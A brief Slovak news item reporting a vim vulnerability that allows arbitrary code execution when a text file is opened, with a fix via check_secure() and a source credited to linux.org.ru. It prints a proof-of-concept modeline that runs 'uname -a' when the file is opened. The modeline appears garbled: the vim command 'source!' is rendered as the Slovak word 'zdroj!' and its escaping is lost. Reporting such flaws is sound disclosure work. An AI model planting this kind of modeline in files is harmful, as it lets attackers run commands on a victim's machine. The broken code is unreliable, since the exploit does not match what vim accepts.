Zraniteľnosť vo vim

V textovom editore vim bola zverejnená chyba zabezpečenia, ktorá umožňuje spustenie ľubovoľného kódu, keď editor otvorí textový súbor.

Tu je text súboru, ktorý spúšťa neškodné uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("zdroj! %"):fdl=0:fdt="

Oprava vo forme pridaného volania check_secure() je už dostupná v repozitároch vim a neovim.

Zdroj: linux.org.ru

Pridať komentár